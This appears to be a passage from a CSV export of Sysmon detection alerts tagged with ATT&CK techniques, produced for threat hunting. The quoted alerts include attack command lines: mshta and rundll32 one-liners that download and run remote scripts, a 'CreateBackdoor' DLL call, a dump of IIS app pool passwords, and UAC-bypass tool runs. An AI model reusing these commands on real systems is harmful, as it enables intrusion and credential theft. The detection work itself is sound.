11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F + 747F3D96-661E-5D3F-0000-0010A3148700 + 776 + C:\Windows\System32\cmd.exe + cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243527 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.682 + 747F3D96-9F61-5E75-0000-001059841E00 + 8076 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k 
netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424175 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:21.693 + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 
(win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4904 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:18.451 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + 
C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F + 747F3D96-661E-5D3F-0000-0010A3148700 + 776 + C:\Windows\System32\cmd.exe + cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243527 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.682 + 747F3D96-9F61-5E75-0000-001059841E00 + 8076 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564845391.87585,2019-08-03T19:16:31.875850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( 
C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5536 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 15:16:31.676 + 747F3D96-A54F-5D45-0000-0010D83FA101 + 1716 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A54F-5D45-0000-0010C429A101 + 6080 + C:\Windows\System32\dllhost.exe + C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ 
+ IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,Critical,"Found User (LAPTOP-JU4M3I0E\bouss) run Suspicious PowerShell commands that include (powershell,.cmd) in event with Command Line (powershell.exe start-process notepad.exe) and Parent Image :C:\Windows\SysWOW64\cmd.exe , Parent CommandLine ("C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd) in directory : ( C:\Users\bouss\source\repos\blabla\blabla\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2429138 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-01-26 13:21:14.021 + 00247C92-174A-6010-0000-0010C0B2D92E + 18548 + C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe + 10.0.18362.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe start-process notepad.exe + C:\Users\bouss\source\repos\blabla\blabla\ + LAPTOP-JU4M3I0E\bouss + 00247C92-5082-600D-0000-0020A246F726 + 0x26f746a2 + 5 + Medium + SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A + 00247C92-1749-6010-0000-0010EFAAD92E + 23168 + C:\Windows\SysWOW64\cmd.exe + 
"C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243527 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.682 + 747F3D96-9F61-5E75-0000-001059841E00 + 8076 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602619902.353945,2020-10-14T00:11:42.353945+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2196443 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-13 20:11:42.277 + 00247C92-09FE-5F86-0000-0010AD861401 + 7648 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + 
c:\windows\system32\cmd.exe + c:\Windows\System32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-DE70-5F85-0000-002059F80600 + 0x6f859 + 1 + Medium + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-09FE-5F86-0000-001051841401 + 1716 + C:\Windows\System32\wuauclt.exe + wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta 
https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.5225,2019-05-27T05:29:18.522500+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5928 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.472 + 365ABB72-3D6E-5CEB-0000-0010CC99FF00 + 344 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 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 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,High,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe start-process notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2429138 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-01-26 13:21:14.021 + 00247C92-174A-6010-0000-0010C0B2D92E + 18548 + C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe + 
10.0.18362.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe start-process notepad.exe + C:\Users\bouss\source\repos\blabla\blabla\ + LAPTOP-JU4M3I0E\bouss + 00247C92-5082-600D-0000-0020A246F726 + 0x26f746a2 + 5 + Medium + SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A + 00247C92-1749-6010-0000-0010EFAAD92E + 23168 + C:\Windows\SysWOW64\cmd.exe + "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /delete /tn elevator ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16249 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 00:32:40.164 + 365ABB72-69A8-5CD7-0000-0010C0982200 + 3792 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\schtasks.exe" /delete /tn elevator + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-5DEC-5CD7-0000-00204A380100 + 0x1384a + 1 + High + SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-6998-5CD7-0000-00104E422200 + 2740 + C:\Python27\python.exe + python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line 
Interface,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6175 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:45.383 + 365ABB72-FE6D-5CEB-0000-0010332A0C00 + 3876 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969965.49171,2019-05-27T19:12:45.491710+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6175 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:45.383 + 365ABB72-FE6D-5CEB-0000-0010332A0C00 + 3876 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + 
Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5410 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 11:23:17.702 + 747F3D96-6EA5-5D45-0000-00108FD3E100 + 7844 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6EA5-5D45-0000-0010EED0E100 + 4768 + C:\Windows\SysWOW64\WerFault.exe + C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564829508.675628,2019-08-03T14:51:48.675628+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( 
C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5308 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 10:51:47.872 + 747F3D96-6743-5D45-0000-001068D7B500 + 6456 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\windows\system32\cmd.exe "C:\Program Files\Windows Media Player\osk.exe" + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020FBD31800 + 0x18d3fb + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6742-5D45-0000-00104A66B500 + 6380 + C:\Users\IEUser\Desktop\UACME.exe + UACME.exe 32 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602619902.279861,2020-10-14T00:11:42.279861+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2196442 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-13 20:11:42.277 + 00247C92-09FE-5F86-0000-0010AC861401 + 6372 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\windows\system32\cmd.exe + c:\Windows\System32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-DE70-5F85-0000-002059F80600 + 0x6f859 + 1 + Medium + 